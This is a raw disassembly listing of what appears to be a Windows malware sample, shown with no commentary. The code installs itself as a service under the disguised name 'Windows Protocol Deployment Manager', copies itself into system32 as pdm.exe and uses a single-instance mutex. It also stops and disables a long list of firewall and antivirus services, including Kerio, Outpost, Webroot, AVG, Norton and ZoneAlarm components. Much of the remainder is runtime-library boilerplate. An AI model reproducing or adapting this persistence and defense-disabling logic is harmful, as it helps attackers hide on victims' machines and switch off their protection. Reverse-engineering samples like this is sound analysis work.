test esi, esi
jz short loc_4034A8
push 0
push 0
push 0
push 0
push 0
push 0
push 0
push 0FFFFFFFFh
push 2
push 0FFFFFFFFh
push esi
call dword_40D028 ; ChangeServiceConfigA
push 0
push 0
push esi
call dword_40D010 ; StartServiceA
loc_4034A8: ; CODE XREF: sub_403450+30�j
push esi
call ebx ; CloseServiceHandle
pop esi
loc_4034AC: ; CODE XREF: sub_403450+1B�j
push edi
call ebx ; CloseServiceHandle
pop edi
pop ebx
retn
sub_403450 endp
; ---------------------------------------------------------------------------
align 10h
push ebx
push ebp
push 0F003Fh
push 0
push 0
call dword_40D01C ; OpenSCManagerA
mov ebp, dword_40D020
mov ebx, eax
test ebx, ebx
jz short loc_40352F
push esi
push edi
mov edi, [esp+14h]
push 22h
push edi
push ebx
call dword_40D024 ; OpenServiceA
mov esi, eax
test esi, esi
jz short loc_40352A
push 0
push 0
push 0
push 0
push 0
push 0
push 0
push 0FFFFFFFFh
push 4
push 0FFFFFFFFh
push esi
call dword_40D028 ; ChangeServiceConfigA
push offset aWinsock ; "winsock"
push edi
call sub_404AB0
add esp, 8
test eax, eax
jnz short loc_40352A
push eax
push 1
push esi
call dword_40D02C ; ControlService
loc_40352A: ; CODE XREF: seg001:004034F1�j
; seg001:0040351E�j
push esi
call ebp ; CloseServiceHandle
pop edi
pop esi
loc_40352F: ; CODE XREF: seg001:004034DB�j
push ebx
call ebp ; CloseServiceHandle
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403540 proc near ; CODE XREF: sub_4038C0+10C�p
var_22C = dword ptr -22Ch
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 22Ch
mov eax, dword_410440
xor eax, esp
mov [esp+22Ch+var_4], eax
push ebx
push ebp
push esi
mov esi, [esp+238h+arg_0]
push edi
push 40000000h
xor ebp, ebp
push ebp
push ebp
xor ebx, ebx
call dword_40D01C ; OpenSCManagerA
mov edi, eax
cmp edi, ebp
jz loc_40362E
push 104h
lea eax, [esp+240h+var_108]
push eax
push ebp
call dword_40D0E0 ; GetModuleFileNameA
push ebp
push ebp
push ebp
push ebp
push ebp
lea ecx, [esp+250h+var_108]
push ecx
push ebp
push 2
push 10h
push 10000000h
push offset aWindowsProtoco ; "Windows Protocol Deployment Manager"
push esi
push edi
call dword_40D008 ; CreateServiceA
mov esi, eax
cmp esi, ebp
jz short loc_403627
mov ebx, dword_40D00C
mov eax, 1
mov [esp+23Ch+var_224], eax
mov [esp+23Ch+var_210], eax
lea eax, [esp+23Ch+var_21C]
push eax
push 2
lea edx, [esp+244h+var_224]
push esi
mov [esp+248h+var_220], ebp
mov [esp+248h+var_21C], ebp
mov [esp+248h+var_218], ebp
mov [esp+248h+var_214], ebp
mov [esp+248h+var_20C], edx
call ebx ; ChangeServiceConfig2A
push 100h
push offset aProvidesImplem ; "Provides implementation support for thi"...
lea ecx, [esp+244h+var_208]
push ecx
call dword_40D06C ; lstrcpyn
lea eax, [esp+23Ch+var_22C]
push eax
push 1
lea edx, [esp+244h+var_208]
push esi
mov [esp+248h+var_22C], edx
call ebx ; ChangeServiceConfig2A
push ebp
push ebp
push esi
call dword_40D010 ; StartServiceA
cmp eax, 1
lea ebx, [ebp+1]
jz short loc_403627
mov ebx, ebp
loc_403627: ; CODE XREF: sub_403540+76�j
; sub_403540+E3�j
push esi
call dword_40D020 ; CloseServiceHandle
loc_40362E: ; CODE XREF: sub_403540+34�j
push edi
call dword_40D020 ; CloseServiceHandle
mov ecx, [esp+23Ch+var_4]
pop edi
pop esi
pop ebp
mov eax, ebx
pop ebx
xor ecx, esp
call sub_403F45
add esp, 22Ch
retn
sub_403540 endp
; ---------------------------------------------------------------------------
push ebx
push esi
push edi
push 0F003Fh
xor edi, edi
push edi
push edi
call dword_40D01C ; OpenSCManagerA
mov ebx, dword_40D020
mov esi, eax
test esi, esi
jz short loc_40368B
mov eax, [esp+10h]
push 80000000h
push eax
push esi
call dword_40D024 ; OpenServiceA
test eax, eax
jz short loc_403688
mov edi, 1
loc_403688: ; CODE XREF: seg001:00403681�j
push eax
call ebx ; CloseServiceHandle
loc_40368B: ; CODE XREF: seg001:0040366C�j
push esi
call ebx ; CloseServiceHandle
mov eax, edi
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 10h
loc_4036A0: ; DATA XREF: seg001:00403803�o
mov eax, [esp+4]
sub eax, 1
jz short loc_4036AE
sub eax, 4
jnz short loc_4036C9
loc_4036AE: ; CODE XREF: seg001:004036A7�j
mov eax, dword_411E9C
push offset dword_411E80
push eax
mov dword_411E84, 1
call dword_40D004 ; SetServiceStatus
loc_4036C9: ; CODE XREF: seg001:004036AC�j
xor eax, eax
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4036D0 proc near ; CODE XREF: seg001:004037E5�p
; seg001:00403891�p
push offset aCaisafe ; "CAISafe"
call sub_4032F0
push offset aUmxcfg ; "UmxCfg"
call sub_4032F0
push offset aUmxagent ; "UmxAgent"
call sub_4032F0
push offset aKpf4 ; "KPF4"
call sub_4032F0
push offset aWebrootfirewal ; "WebrootFirewall"
call sub_4032F0
push offset aWinroute ; "WinRoute"
call sub_4032F0
push offset aAvgfwsrv ; "AVGFwSrv"
call sub_4032F0
push offset aAvg7alrt ; "Avg7Alrt"
call sub_4032F0
push offset aOutpostfirewal ; "OutpostFirewall"
call sub_4032F0
push offset aLavasoftfirewa ; "LavasoftFirewall"
call sub_4032F0
push offset aMpfservice ; "MpfService"
call sub_4032F0
push offset aVsmon ; "vsmon"
call sub_4032F0
push offset aNpfmntor ; "NPFMntor"
call sub_4032F0
push offset aCcevtmgr ; "ccEvtMgr"
call sub_4032F0
push offset aCcproxy ; "ccProxy"
call sub_4032F0
push offset aCclspwdsvc ; "cclSPwdSvc"
call sub_4032F0
add esp, 40h
push offset aSpbbcsvc ; "SPBBCSvc"
call sub_4032F0
pop ecx
retn
sub_4036D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403780 proc near ; CODE XREF: seg001:004037E0�p
; seg001:0040388C�p
push offset aWsas ; "wsas"
call sub_4032F0
push offset aNlc ; "nlc"
call sub_4032F0
push offset aNsms ; "nsms"
call sub_4032F0
push offset aNtrcs ; "ntrcs"
call sub_4032F0
push offset aVistaruntimesv ; "VistaRuntimeSvc"
call sub_4032F0
push offset aPdm ; "PDM"
call sub_4032F0
add esp, 18h
retn
sub_403780 endp
; ---------------------------------------------------------------------------
push offset aWpdm_class_ ; "WPDM_Class_"
push 1
push 0
call dword_40D070 ; CreateMutexA
test eax, eax
jz short locret_4037F4
call dword_40D050 ; RtlGetLastWin32Error
cmp eax, 0B7h
jz short locret_4037F4
call sub_403780
call sub_4036D0
call sub_402E60
jmp sub_402040
; ---------------------------------------------------------------------------
locret_4037F4: ; CODE XREF: seg001:004037D1�j
; seg001:004037DE�j
retn
; ---------------------------------------------------------------------------
align 10h
loc_403800: ; DATA XREF: sub_4038C0+DD�o
push esi
push 0
push offset loc_4036A0
push offset aPdm_0 ; "PDM"
call dword_40D000 ; RegisterServiceCtrlHandlerExA
mov esi, dword_40D004
push offset dword_411E80
push eax
mov dword_411E9C, eax
mov dword_411E94, 1
mov dword_411E88, 5
mov dword_411E84, 4
mov dword_411E90, 0
mov dword_411E80, 10h
mov dword_411E98, 0
mov dword_411E8C, 0
call esi ; SetServiceStatus
push offset aWpdm_class_ ; "WPDM_Class_"
push 1
push 0
call dword_40D070 ; CreateMutexA
test eax, eax
jz short loc_4038A0
call dword_40D050 ; RtlGetLastWin32Error
cmp eax, 0B7h
jz short loc_4038A0
call sub_403780
call sub_4036D0
call sub_402E60
call sub_402040
; ---------------------------------------------------------------------------
loc_4038A0: ; CODE XREF: seg001:0040387D�j
; seg001:0040388A�j
mov eax, dword_411E9C
push offset dword_411E80
push eax
mov dword_411E84, 1
call esi ; SetServiceStatus
pop esi
retn 8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4038C0 proc near ; CODE XREF: seg001:00404D0D�p
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = byte ptr -310h
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
sub esp, 320h
mov eax, dword_410440
xor eax, esp
mov [esp+320h+var_4], eax
push 2
call dword_40D074 ; SetErrorMode
push 104h
lea eax, [esp+324h+var_108]
push eax
push 0
call dword_40D0E0 ; GetModuleFileNameA
push 104h
lea ecx, [esp+324h+var_20C]
push ecx
call dword_40D060 ; GetWindowsDirectoryA
lea edx, [esp+320h+var_20C]
push edx
push offset aSSystem32 ; "%s\\system32"
lea eax, [esp+328h+var_310]
push 104h
push eax
call sub_40481B
lea ecx, [esp+330h+var_310]
push ecx
lea edx, [esp+334h+var_108]
push edx
call sub_404AB0
add esp, 18h
test eax, eax
jnz short loc_40394B
lea eax, [esp+320h+var_310]
push offset aPdm_exe ; "pdm.exe"
push eax
call sub_402F20
add esp, 8
loc_40394B: ; CODE XREF: sub_4038C0+77�j
push ebx
push esi
push edi
push 0F003Fh
xor edi, edi
push edi
push edi
call dword_40D01C ; OpenSCManagerA
mov ebx, dword_40D020
mov esi, eax
test esi, esi
jz short loc_403986
push 80000000h
push offset aPdm_1 ; "PDM"
push esi
call dword_40D024 ; OpenServiceA
test eax, eax
jz short loc_403983
mov edi, 1
loc_403983: ; CODE XREF: sub_4038C0+BC�j
push eax
call ebx ; CloseServiceHandle
loc_403986: ; CODE XREF: sub_4038C0+A7�j
push esi
call ebx ; CloseServiceHandle
cmp edi, 1
pop edi
pop esi
pop ebx
jnz short loc_4039C7
lea ecx, [esp+320h+var_320]
push ecx
mov [esp+324h+var_320], offset aPdm_3 ; "PDM"
mov [esp+324h+var_31C], offset loc_403800
mov [esp+324h+var_318], 0
mov [esp+324h+var_314], 0
call dword_40D044 ; StartServiceCtrlDispatcherA
push offset aPdm_4 ; "PDM"
call sub_403450
jmp short loc_4039D1
; ---------------------------------------------------------------------------
loc_4039C7: ; CODE XREF: sub_4038C0+CF�j
push offset aPdm_5 ; "PDM"
call sub_403540
loc_4039D1: ; CODE XREF: sub_4038C0+105�j
mov ecx, [esp+324h+var_4]
add esp, 4
xor ecx, esp
xor eax, eax
call sub_403F45
add esp, 320h
retn 10h
sub_4038C0 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4039EE proc near ; CODE XREF: sub_403040+D8�p
jmp dword_40D0B8
sub_4039EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4039F4 proc near ; CODE XREF: sub_403040+49�p
jmp dword_40D0A8
sub_4039F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4039FA proc near ; CODE XREF: sub_403040+2D�p
jmp dword_40D0A4
sub_4039FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A00 proc near ; CODE XREF: seg001:004010D9�p
; sub_4014F0+69�p ...
jmp dword_40D210
sub_403A00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A06 proc near ; CODE XREF: seg001:00401077�p
; seg001:00401081�p ...
jmp dword_40D20C
sub_403A06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A0C proc near ; CODE XREF: seg001:00401306�p
; seg001:0040132C�p ...
jmp dword_40D208
sub_403A0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A12 proc near ; CODE XREF: seg001:004012A3�p
; sub_401840+BB�p ...
jmp dword_40D204
sub_403A12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A18 proc near ; CODE XREF: seg001:0040142F�p
; sub_401710+61�p ...
jmp dword_40D200
sub_403A18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A1E proc near ; CODE XREF: seg001:00401417�p
; seg001:00401B5C�p ...
jmp dword_40D1FC
sub_403A1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A24 proc near ; CODE XREF: seg001:004013FB�p
; sub_4014F0+A4�p ...
jmp dword_40D1F8
sub_403A24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A2A proc near ; CODE XREF: sub_401470+33�p
; sub_401470+3F�p ...
jmp dword_40D1F4
sub_403A2A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A30 proc near ; CODE XREF: sub_401470+2A�p
; seg001:004016A7�p
jmp dword_40D1F0
sub_403A30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A36 proc near ; CODE XREF: sub_4014F0+BB�p
; seg001:00401674�p ...
jmp dword_40D1EC
sub_403A36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A3C proc near ; CODE XREF: sub_4014F0+2C�p
; seg001:004015E7�p ...
jmp dword_40D214
sub_403A3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A42 proc near ; CODE XREF: sub_401710+7C�p
jmp dword_40D1E8
sub_403A42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A48 proc near ; CODE XREF: sub_4017C0+3B�p
jmp dword_40D1E4
sub_403A48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A4E proc near ; CODE XREF: sub_401840+D5�p
jmp dword_40D1E0
sub_403A4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A54 proc near ; CODE XREF: sub_401A10+26�p
jmp dword_40D1DC
sub_403A54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A5A proc near ; CODE XREF: sub_401A80+19�p
; seg001:00401E19�p ...
jmp dword_40D1D8
sub_403A5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A60 proc near ; CODE XREF: seg001:00401D36�p
; sub_401E40+CB�p
jmp dword_40D1D4
sub_403A60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A66 proc near ; CODE XREF: seg001:00401DC4�p
jmp dword_40D1D0
sub_403A66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A6C proc near ; CODE XREF: sub_402040+5B�p
jmp dword_40D1CC
sub_403A6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403A72 proc near ; CODE XREF: sub_403040+84�p
jmp dword_40D1C4
sub_403A72 endp
; =============== S U B R O U T I N E =======================================
sub_403A78 proc near ; CODE XREF: seg001:0040110C�p
; sub_402040+5AA�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push ebp
xor ebp, ebp
cmp ebx, ebp
jnz short loc_403A88
xor eax, eax
jmp short loc_403AC5
; ---------------------------------------------------------------------------
loc_403A88: ; CODE XREF: sub_403A78+A�j
push esi
push edi
push ebx
call sub_404F20
mov esi, eax
inc esi
push esi
call sub_403B17
mov edi, eax
cmp edi, ebp
pop ecx
pop ecx
jz short loc_403AC1
push ebx
push esi
push edi
call sub_404EAF
add esp, 0Ch
test eax, eax
jz short loc_403ABD
push ebp
push ebp
push ebp
push ebp
push ebp
call sub_404D8F
add esp, 14h
loc_403ABD: ; CODE XREF: sub_403A78+36�j
mov eax, edi
jmp short loc_403AC3
; ---------------------------------------------------------------------------
loc_403AC1: ; CODE XREF: sub_403A78+27�j
xor eax, eax
loc_403AC3: ; CODE XREF: sub_403A78+47�j
pop edi
pop esi
loc_403AC5: ; CODE XREF: sub_403A78+E�j
pop ebp
pop ebx
retn
sub_403A78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AC8 proc near ; CODE XREF: sub_403B17+59�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_40E4B0
call __SEH_prolog4
and [ebp+var_1C], 0
mov esi, [ebp+arg_0]
cmp esi, dword_413B94
ja short loc_403B05
push 4
call sub_405121
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_40596E
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403B0E
loc_403B05: ; CODE XREF: sub_403AC8+19�j
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_403AC8 endp
; =============== S U B R O U T I N E =======================================
sub_403B0E proc near ; CODE XREF: sub_403AC8+38�p
; DATA XREF: seg001:0040E4C8�o
push 4
call sub_405049
pop ecx
retn
sub_403B0E endp
; =============== S U B R O U T I N E =======================================
sub_403B17 proc near ; CODE XREF: seg001:00401104�p
; sub_401840+30�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
cmp ebp, 0FFFFFFE0h
ja loc_403BC4
push ebx
mov ebx, dword_40D0F8
push esi
push edi
loc_403B2E: ; CODE XREF: sub_403B17+94�j
xor esi, esi
cmp dword_41157C, esi
mov edi, ebp
jnz short loc_403B52
call sub_405F02
push 1Eh
call sub_405D62
push 0FFh
call sub_404279
pop ecx
pop ecx
loc_403B52: ; CODE XREF: sub_403B17+21�j
mov eax, dword_413B88
cmp eax, 1
jnz short loc_403B6A
cmp ebp, esi
jz short loc_403B64
mov eax, ebp
jmp short loc_403B67
; ---------------------------------------------------------------------------
loc_403B64: ; CODE XREF: sub_403B17+47�j
xor eax, eax
inc eax
loc_403B67: ; CODE XREF: sub_403B17+4B�j
push eax
jmp short loc_403B88
; ---------------------------------------------------------------------------
loc_403B6A: ; CODE XREF: sub_403B17+43�j
cmp eax, 3
jnz short loc_403B7A
push ebp
call sub_403AC8
cmp eax, esi
pop ecx
jnz short loc_403B91
loc_403B7A: ; CODE XREF: sub_403B17+56�j
cmp ebp, esi
jnz short loc_403B81
xor edi, edi
inc edi
loc_403B81: ; CODE XREF: sub_403B17+65�j
add edi, 0Fh
and edi, 0FFFFFFF0h
push edi
loc_403B88: ; CODE XREF: sub_403B17+51�j
push esi
push dword_41157C
call ebx ; RtlAllocateHeap
loc_403B91: ; CODE XREF: sub_403B17+61�j
mov esi, eax
test esi, esi
jnz short loc_403BBD
cmp dword_411898, eax
push 0Ch
pop edi
jz short loc_403BAF
push ebp
call sub_405F45
test eax, eax
pop ecx
jnz short loc_403B2E
jmp short loc_403BB6
; ---------------------------------------------------------------------------
loc_403BAF: ; CODE XREF: sub_403B17+89�j
call sub_403F8F
mov [eax], edi
loc_403BB6: ; CODE XREF: sub_403B17+96�j
call sub_403F8F
mov [eax], edi
loc_403BBD: ; CODE XREF: sub_403B17+7E�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_403BC4: ; CODE XREF: sub_403B17+8�j
push ebp
call sub_405F45
pop ecx
call sub_403F8F
mov dword ptr [eax], 0Ch
xor eax, eax
pop ebp
retn
sub_403B17 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BE0 proc near ; CODE XREF: seg001:004010FD�p
; sub_4014F0+91�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_403C00
cmp edi, eax
jb loc_403DA4
loc_403C00: ; CODE XREF: sub_403BE0+16�j
cmp ecx, 100h
jb short loc_403C27
cmp dword_413B84, 0
jz short loc_403C27
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jnz short loc_403C27
pop esi
pop edi
pop ebp
jmp sub_405FEE
; ---------------------------------------------------------------------------
loc_403C27: ; CODE XREF: sub_403BE0+26�j
; sub_403BE0+2F�j ...
test edi, 3
jnz short loc_403C44
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_403C64
rep movsd
jmp off_403D54[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_403C44: ; CODE XREF: sub_403BE0+4D�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_403C5C
and eax, 3
add ecx, eax
jmp dword ptr loc_403C64+4[eax*4]
; ---------------------------------------------------------------------------
loc_403C5C: ; CODE XREF: sub_403BE0+6E�j
jmp dword ptr loc_403D64[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_403C64: ; CODE XREF: sub_403BE0+58�j
; sub_403BE0+B6�j ...
jmp off_403CE8[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_403C78
dd offset loc_403CA4
; ---------------------------------------------------------------------------
enter 403Ch, 0
loc_403C78: ; DATA XREF: sub_403BE0+8C�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_403C64
rep movsd
jmp off_403D54[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_403CA4: ; DATA XREF: sub_403BE0+90�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_403C64
rep movsd
jmp off_403D54[edx*4]
; ---------------------------------------------------------------------------
align 4
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_403C64
rep movsd
jmp off_403D54[edx*4]
; ---------------------------------------------------------------------------
align 4
off_403CE8 dd offset loc_403D4B ; DATA XREF: sub_403BE0:loc_403C64�r
dd offset loc_403D38
dd offset loc_403D30
dd offset loc_403D28
dd offset loc_403D20
dd offset loc_403D18
dd offset loc_403D10
dd offset loc_403D08
; ---------------------------------------------------------------------------
loc_403D08: ; CODE XREF: sub_403BE0:loc_403C64�j
; DATA XREF: sub_403BE0+124�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_403D10: ; CODE XREF: sub_403BE0:loc_403C64�j
; DATA XREF: sub_403BE0+120�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_403D18: ; CODE XREF: sub_403BE0:loc_403C64�j
; DATA XREF: sub_403BE0+11C�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_403D20: ; CODE XREF: sub_403BE0:loc_403C64�j
; DATA XREF: sub_403BE0+118�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_403D28: ; CODE XREF: sub_403BE0:loc_403C64�j
; DATA XREF: sub_403BE0+114�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_403D30: ; CODE XREF: sub_403BE0:loc_403C64�j
; DATA XREF: sub_403BE0+110�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_403D38: ; CODE XREF: sub_403BE0:loc_403C64�j
; DATA XREF: sub_403BE0+10C�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_403D4B: ; CODE XREF: sub_403BE0:loc_403C64�j
; DATA XREF: sub_403BE0:off_403CE8�o
jmp off_403D54[edx*4]
; ---------------------------------------------------------------------------
align 4
off_403D54 dd offset loc_403D64 ; DATA XREF: sub_403BE0+5C�r
; sub_403BE0+BA�r ...
dd offset loc_403D6C
dd offset loc_403D78
dd offset loc_403D8C
; ---------------------------------------------------------------------------
loc_403D64: ; CODE XREF: sub_403BE0+5C�j
; sub_403BE0+BA�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_403D6C: ; CODE XREF: sub_403BE0+5C�j
; sub_403BE0+BA�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_403D78: ; CODE XREF: sub_403BE0+5C�j
; sub_403BE0+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_403D8C: ; CODE XREF: sub_403BE0+5C�j
; sub_403BE0+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_403DA4: ; CODE XREF: sub_403BE0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_403DD8
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_403DCC
std
rep movsd
cld
jmp off_403EF0[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_403DCC: ; CODE XREF: sub_403BE0+1DD�j
; sub_403BE0+238�j ...
neg ecx
jmp off_403EA0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_403DD8: ; CODE XREF: sub_403BE0+1D2�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_403DF0
and eax, 3
sub ecx, eax
jmp dword ptr loc_403DF0+4[eax*4]
; ---------------------------------------------------------------------------
loc_403DF0: ; CODE XREF: sub_403BE0+202�j
; DATA XREF: sub_403BE0+209�r
jmp off_403EF0[ecx*4]
; ---------------------------------------------------------------------------
align 4
add al, 3Eh
inc eax
add [eax], ch
db 3Eh
inc eax
add [eax+3Eh], dl
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_403DCC
std
rep movsd
cld
jmp off_403EF0[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_403DCC
std
rep movsd
cld
jmp off_403EF0[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_403DCC
std
rep movsd
cld
jmp off_403EF0[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_403EA4
dd offset loc_403EAC
dd offset loc_403EB4
dd offset loc_403EBC
dd offset loc_403EC4
dd offset loc_403ECC
dd offset loc_403ED4
off_403EA0 dd offset loc_403EE7 ; DATA XREF: sub_403BE0+1EE�r
; ---------------------------------------------------------------------------
loc_403EA4: ; DATA XREF: sub_403BE0+2A4�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_403EAC: ; DATA XREF: sub_403BE0+2A8�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_403EB4: ; DATA XREF: sub_403BE0+2AC�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_403EBC: ; DATA XREF: sub_403BE0+2B0�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_403EC4: ; DATA XREF: sub_403BE0+2B4�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_403ECC: ; DATA XREF: sub_403BE0+2B8�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_403ED4: ; DATA XREF: sub_403BE0+2BC�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_403EE7: ; CODE XREF: sub_403BE0+1EE�j
; DATA XREF: sub_403BE0:off_403EA0�o
jmp off_403EF0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_403EF0 dd offset loc_403F00 ; DATA XREF: sub_403BE0+1E3�r
; sub_403BE0:loc_403DF0�r ...
dd offset loc_403F08
dd offset loc_403F18
dd offset loc_403F2C
; ---------------------------------------------------------------------------
loc_403F00: ; CODE XREF: sub_403BE0+1E3�j
; sub_403BE0:loc_403DF0�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_403F08: ; CODE XREF: sub_403BE0+1E3�j
; sub_403BE0:loc_403DF0�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_403F18: ; CODE XREF: sub_403BE0+1E3�j
; sub_403BE0:loc_403DF0�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_403F2C: ; CODE XREF: sub_403BE0+1E3�j
; sub_403BE0:loc_403DF0�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_403BE0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403F45 proc near ; CODE XREF: seg001:004013B9�p
; seg001:004013D7�p ...
cmp ecx, dword_410440
jnz short loc_403F4F
rep retn
